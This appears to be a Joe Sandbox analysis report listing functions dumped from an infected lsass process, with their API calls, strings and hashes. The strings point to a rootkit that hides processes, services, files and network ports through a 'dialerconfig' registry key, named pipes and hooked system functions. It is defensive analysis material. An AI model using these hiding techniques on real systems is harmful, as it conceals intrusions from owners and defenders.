Instruction ID: 753debf45003fca23bbd89451e0858c88dad29376ee457e4c6d8acfc835c9214
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 0061213A741251A7EE6CCF25D8807BCBB91FB08BA4F08D021DE1917785DB7AE852C708

Non-executed Functions

Function 00000161C7372CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000161C7372D80
lstrlenW.KERNEL32 ref: 00000161C7372FBA

Part of subcall function 00000161C7371A14: OpenProcess.KERNEL32 ref: 00000161C7371A3A
Part of subcall function 00000161C7371A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000161C7371A58
Part of subcall function 00000161C7371A14: PathFindFileNameW.SHLWAPI ref: 00000161C7371A67
Part of subcall function 00000161C7371A14: lstrlenW.KERNEL32 ref: 00000161C7371A73
Part of subcall function 00000161C7371A14: StrCpyW.SHLWAPI ref: 00000161C7371A86
Part of subcall function 00000161C7371A14: CloseHandle.KERNEL32 ref: 00000161C7371A94

GetProcAddress.KERNEL32 ref: 00000161C7372D95

Part of subcall function 00000161C7371554: StrCmpIW.SHLWAPI ref: 00000161C7371585

Part of subcall function 00000161C7373930: StrCmpNIW.SHLWAPI ref: 00000161C7373948

StrCmpNIW.SHLWAPI ref: 00000161C7372DD8
lstrlenW.KERNEL32 ref: 00000161C7372F00

Strings

ntdll.dll, xrefs: 00000161C7372D79
NtQueryObject, xrefs: 00000161C7372D8B
\Device\Nsi, xrefs: 00000161C7372DCB

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 5f7e17151d40d13e17ee65c53971fe04583e634f4e977e6e4113f518a1978c5c
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 93B18D72251A90A2EB64DF25DE407FDA3B4FB44B84F58A016EE4A57B94DFB6CD80C340

Function 00000161C7377E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000161C7377E8C
RtlCaptureContext.NTDLL ref: 00000161C7377EB9
RtlLookupFunctionEntry.NTDLL ref: 00000161C7377ED3
RtlVirtualUnwind.NTDLL ref: 00000161C7377F14
IsDebuggerPresent.KERNEL32 ref: 00000161C7377F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000161C7377F89
UnhandledExceptionFilter.KERNEL32 ref: 00000161C7377F94

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 1c999d73cb63400ff9ddaa33e8c1de629fe6808ff2e851a20406783bb7284195
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 0A314072245B80AAEB60DF70EC947ED7364F784744F48542ADA4E47B98EFB9C648C710

Function 00000161C737B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000161C737B585
RtlLookupFunctionEntry.NTDLL ref: 00000161C737B59D
RtlVirtualUnwind.NTDLL ref: 00000161C737B5D8
IsDebuggerPresent.KERNEL32 ref: 00000161C737B611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000161C737B61B
UnhandledExceptionFilter.KERNEL32 ref: 00000161C737B626

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 576d884e8ab9a5df693fae33aacf7129b945d4d62f967a2595bc9b77306fc2e4
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 00315D32254F80A6EB60CF25EC403EE73A4F788754F581126EA9D47BA8EF79C555CB00

Function 00000161C737FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000161C737FF67
WriteFile.KERNEL32 ref: 00000161C738021E
WriteFile.KERNEL32 ref: 00000161C7380270
GetLastError.KERNEL32 ref: 00000161C7380372
GetLastError.KERNEL32 ref: 00000161C73803D2

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 7470bcd264ebdb1d61975f6fba5fd62305675220ec5363bce02882cec682ac70
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 4DE12172B44A80AAE700CF74D9802ED7BB1F3457D8F186116EF4A57B99DABAC51AC700

Function 00000161C7371650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000161C737165B
HeapAlloc.KERNEL32 ref: 00000161C737166A

Part of subcall function 00000161C7371274: GetProcessHeap.KERNEL32 ref: 00000161C737127A
Part of subcall function 00000161C7371274: HeapAlloc.KERNEL32 ref: 00000161C7371289
Part of subcall function 00000161C7371274: GetProcessHeap.KERNEL32 ref: 00000161C73712A3
Part of subcall function 00000161C7371274: HeapAlloc.KERNEL32 ref: 00000161C73712B4

RegOpenKeyExW.ADVAPI32 ref: 00000161C73716DA
RegOpenKeyExW.ADVAPI32 ref: 00000161C7371707
RegCloseKey.ADVAPI32 ref: 00000161C7371721
RegOpenKeyExW.ADVAPI32 ref: 00000161C7371741
RegCloseKey.ADVAPI32 ref: 00000161C737175C
RegOpenKeyExW.ADVAPI32 ref: 00000161C737177C
RegCloseKey.ADVAPI32 ref: 00000161C7371797
RegOpenKeyExW.ADVAPI32 ref: 00000161C73717B7
RegCloseKey.ADVAPI32 ref: 00000161C73717D2
RegOpenKeyExW.ADVAPI32 ref: 00000161C73717F2
RegCloseKey.ADVAPI32 ref: 00000161C737180D
RegOpenKeyExW.ADVAPI32 ref: 00000161C737182D
RegCloseKey.ADVAPI32 ref: 00000161C7371848
RegOpenKeyExW.ADVAPI32 ref: 00000161C7371868
RegCloseKey.ADVAPI32 ref: 00000161C7371883
RegOpenKeyExW.ADVAPI32 ref: 00000161C73718A3
RegCloseKey.ADVAPI32 ref: 00000161C73718BE
RegCloseKey.ADVAPI32 ref: 00000161C73718C8

Part of subcall function 00000161C73712C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000161C7371326
Part of subcall function 00000161C73712C8: GetProcessHeap.KERNEL32 ref: 00000161C7371334
Part of subcall function 00000161C73712C8: HeapAlloc.KERNEL32 ref: 00000161C7371345
Part of subcall function 00000161C73712C8: RegEnumValueW.ADVAPI32 ref: 00000161C73713A1
Part of subcall function 00000161C73712C8: GetProcessHeap.KERNEL32 ref: 00000161C73713E9
Part of subcall function 00000161C73712C8: HeapAlloc.KERNEL32 ref: 00000161C73713F7
Part of subcall function 00000161C73712C8: GetProcessHeap.KERNEL32 ref: 00000161C737141B
Part of subcall function 00000161C73712C8: HeapFree.KERNEL32 ref: 00000161C7371429
Part of subcall function 00000161C73712C8: lstrlenW.KERNEL32 ref: 00000161C7371432
Part of subcall function 00000161C73712C8: GetProcessHeap.KERNEL32 ref: 00000161C7371440
Part of subcall function 00000161C73712C8: HeapAlloc.KERNEL32 ref: 00000161C737144E

Strings

pid, xrefs: 00000161C737173A
startup, xrefs: 00000161C73716FD
tcp_local, xrefs: 00000161C7371826
paths, xrefs: 00000161C73717B0
tcp_remote, xrefs: 00000161C7371861
SOFTWARE\dialerconfig, xrefs: 00000161C73716BA
udp, xrefs: 00000161C737189C
process_names, xrefs: 00000161C7371775
service_names, xrefs: 00000161C73717EB

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: bac694574e066e5e58aad9baef0457057bf733d5e732b3e8eccede4856c6230b
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 2E711977350A54A5EB10DF66EC906ED67B4FB88B88F082112DE4E57B28DFBAC445C300

Function 00000161C73712C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000161C7371326
GetProcessHeap.KERNEL32 ref: 00000161C7371334
HeapAlloc.KERNEL32 ref: 00000161C7371345
RegEnumValueW.ADVAPI32 ref: 00000161C73713A1

Part of subcall function 00000161C7371554: StrCmpIW.SHLWAPI ref: 00000161C7371585

GetProcessHeap.KERNEL32 ref: 00000161C73713E9
HeapAlloc.KERNEL32 ref: 00000161C73713F7
GetProcessHeap.KERNEL32 ref: 00000161C737141B
HeapFree.KERNEL32 ref: 00000161C7371429
lstrlenW.KERNEL32 ref: 00000161C7371432
GetProcessHeap.KERNEL32 ref: 00000161C7371440
HeapAlloc.KERNEL32 ref: 00000161C737144E
StrCpyW.SHLWAPI ref: 00000161C7371470
GetProcessHeap.KERNEL32 ref: 00000161C7371485
HeapFree.KERNEL32 ref: 00000161C7371493

Strings

d, xrefs: 00000161C7371365

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 3d38bf89a75d8b946b5c3b2838e87fcd06390733cbd2f41a865d7184c1faa48d
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 3B515D72294B44A7EB14DF62E9443AEB3B1F788FC0F489125DA8907B18EF79C556C740

Function 00000161C7371EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000161C7371EBF

Part of subcall function 00000161C7372174: GetModuleHandleA.KERNEL32 ref: 00000161C737218C
Part of subcall function 00000161C7372174: GetProcAddress.KERNEL32 ref: 00000161C737219D

Part of subcall function 00000161C7375C10: GetCurrentThreadId.KERNEL32 ref: 00000161C7375C4B

Strings

NtResumeThread, xrefs: 00000161C7371F02
NtQuerySystemInformation, xrefs: 00000161C7371EE5
ntdll.dll, xrefs: 00000161C7371ECD
NtEnumerateValueKey, xrefs: 00000161C7371F76
advapi32.dll, xrefs: 00000161C7371F97, 00000161C7371FB8
NtQueryDirectoryFile, xrefs: 00000161C7371F1F
sechost.dll, xrefs: 00000161C7371FD9
NtQueryDirectoryFileEx, xrefs: 00000161C7371F3C
EnumServiceGroupW, xrefs: 00000161C7371F90
NtEnumerateKey, xrefs: 00000161C7371F59
EnumServicesStatusExW, xrefs: 00000161C7371FB1, 00000161C7371FD2
NtDeviceIoControlFile, xrefs: 00000161C7371FF6

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 49f491b1114c17fc5b9eacd07654677d67374de2c3185f395ad3eeba9b552718
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: AD31B2B06C1A4AB0FB08EF65EE516FCA331B744344F8CB427D5191A2A19EFE8249C394

Function 00000161C73723F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000161C7372405
GetCurrentProcessId.KERNEL32 ref: 00000161C737240F

Part of subcall function 00000161C73719AC: OpenProcess.KERNEL32 ref: 00000161C73719CA
Part of subcall function 00000161C73719AC: IsWow64Process.KERNEL32 ref: 00000161C73719E0
Part of subcall function 00000161C73719AC: CloseHandle.KERNEL32 ref: 00000161C73719FB

CreateFileW.KERNEL32 ref: 00000161C7372468
WriteFile.KERNEL32 ref: 00000161C7372490
ReadFile.KERNEL32 ref: 00000161C73724AF
CloseHandle.KERNEL32 ref: 00000161C73724B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000161C7372438
\\.\pipe\dialerchildproc32, xrefs: 00000161C737243F

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 5325a0d27dd868932963c021d9ab6f9312d764df4a13a3df53fb5f637614eb62
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 49218336654740A3F710CB25F9443AD73A0F389BA4F585216EA5906FA8CF7DC149CF01

Function 00000161C737104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000161C73710AB
RegEnumValueW.ADVAPI32 ref: 00000161C737110E
GetProcessHeap.KERNEL32 ref: 00000161C7371155
HeapAlloc.KERNEL32 ref: 00000161C7371163
GetProcessHeap.KERNEL32 ref: 00000161C7371187
HeapFree.KERNEL32 ref: 00000161C7371195

Strings

d, xrefs: 00000161C73710CE

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: c103aa25b89fd2791b0dc1a4f3884d925eea64b7120042f332de2eb3fb4b6860
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: E2418E73254B80A7E760CF62E9447EEB7A1F389B84F048129DB890BB58DF79D565CB00

Function 00000161C73775F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000161C7377618
__scrt_acquire_startup_lock.LIBCMT ref: 00000161C737766A
_RTC_Initialize.LIBCMT ref: 00000161C7377698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000161C73776BE
__scrt_release_startup_lock.LIBCMT ref: 00000161C73776E9

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 2437d1291d5cf0746fa6b084c76fbccc36d1da703f0b31ac4ddfed02c7416eec
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: AB81C331794381B6FB50EB39DE4A3FDA290BB45780F1CB4269A454B796DBFBC8428700

Function 00000161C73469F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000161C7346A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000161C7346A6A
_RTC_Initialize.LIBCMT ref: 00000161C7346A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000161C7346ABE
__scrt_release_startup_lock.LIBCMT ref: 00000161C7346AE9

Memory Dump Source

Source File: 0000001E.00000002.2683325193.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7340000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 9bc5ea147a7aad2e72992b302cef43ee44e9d81e0f7bd84fd64cc92e160e70a2
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: C781C179780641E6FBACEF669C413FD6ED0EB85780F0CA425AA4543796DBFBC8858700

Function 00000161C7379804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000161C7379889
GetLastError.KERNEL32 ref: 00000161C7379897
LoadLibraryExW.KERNEL32 ref: 00000161C73798C1
FreeLibrary.KERNEL32 ref: 00000161C7379907
GetProcAddress.KERNEL32 ref: 00000161C7379913

Strings

api-ms-, xrefs: 00000161C73798A9

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 45d2a1f1252e43b1023eab92359966857d29bef03d80f98157756e4e219bf09b
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: C431A131252A50B1FE12DB16ED007FDA798FB49BA0F1D2625ED2E4B380DFB9C4458301

Function 00000161C7381B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000161C7381BCD
GetLastError.KERNEL32 ref: 00000161C7381BD9
CloseHandle.KERNEL32 ref: 00000161C7381BF1
CreateFileW.KERNEL32 ref: 00000161C7381C1C
WriteConsoleW.KERNEL32 ref: 00000161C7381C3B

Strings

CONOUT$, xrefs: 00000161C7381BFD

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 3f600ca17e452463787aefc2aed782dd109e2a97a554c300af6a570e9c3852af
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: F011C131354B4096E750CB42EC443AD73A0F788FE4F181226EA6E87794DFBAC9448740

Function 00000161C7375C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000161C7375C4B
GetThreadContext.KERNEL32 ref: 00000161C7375DB5

Part of subcall function 00000161C7375A40: GetCurrentThreadId.KERNEL32 ref: 00000161C7375A44

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 2e2f61579a6f2e916cff6da32b27f3607b4cc0deb3cec3b2fe3091d29b30bdb3
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 79D1DC76249B88D1DA70DB1AE9943AEB7A0F3C8B84F141116EACD47BA5CF7DC541CB10

Function 00000161C73730B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000161C73730D7
HeapAlloc.KERNEL32 ref: 00000161C73730EA
StrCmpNIW.SHLWAPI ref: 00000161C737316B
GetProcessHeap.KERNEL32 ref: 00000161C73731D1
HeapFree.KERNEL32 ref: 00000161C73731DF

Strings

dialer, xrefs: 00000161C7373164

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 74dfe70cc55a56dbe81b02a3433dda816ea6b8ac04725d8000acfd651d5af572
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 5E319332741B95A2EB15EF16EE442BDA3A0FB44B84F0C60259E880BB54EF7AC4A1C700

Function 00000161C7371A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000161C7371A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000161C7371A58
PathFindFileNameW.SHLWAPI ref: 00000161C7371A67
lstrlenW.KERNEL32 ref: 00000161C7371A73
StrCpyW.SHLWAPI ref: 00000161C7371A86
CloseHandle.KERNEL32 ref: 00000161C7371A94

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 4c70521da344cb37a27b07ce2496e1f021a657d7cb7412359c2e65f8f9324436
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 51014C31340B41A6EB54DB12E8587ADA3A1FB88FC0F4C9436DE9947754DEBEC989C740

Function 00000161C73737AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000161C73737C8
GetCurrentProcess.KERNEL32 ref: 00000161C73737D6
VirtualProtectEx.KERNEL32 ref: 00000161C73737F8
GetCurrentProcess.KERNEL32 ref: 00000161C7373819
VirtualProtectEx.KERNEL32 ref: 00000161C737383A
TerminateThread.KERNEL32 ref: 00000161C7373849

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: f0b7604b334eccdb4ecdd7bdf2ab27903f1f8e13506f2ca30095ada75f22220d
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 69112D75651740A2FB24DB21EC197AEA7B4BB49F81F081426CD590B794EFBEC448C701

Function 00000161C73790D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000161C7379103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000161C7379198
RtlUnwindEx.NTDLL ref: 00000161C73791E7

Strings

csm, xrefs: 00000161C737917E
f, xrefs: 00000161C7379116

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 6859a97d5e20faf6c2b46333e7f06531972a9ef60438c319c55f6cb05a828662
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 4651E332351608AAEB14DF25ED44BBDBBA5F344B98F5AA224DE0647748DBB6CC41C700

Function 00000161C7373200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000161C7373222
StrCpyW.SHLWAPI ref: 00000161C7373232
StrCatW.SHLWAPI ref: 00000161C737323E
PathCombineW.SHLWAPI ref: 00000161C737324C

Strings

\\.\pipe\, xrefs: 00000161C7373218

Memory Dump Source

Source File: 0000001E.00000002.2683532709.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_161c7370000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: efd814f4256ff47e1c05b6ff9bd054462aecfc471a0c7335e8c8b60c4ee9b276
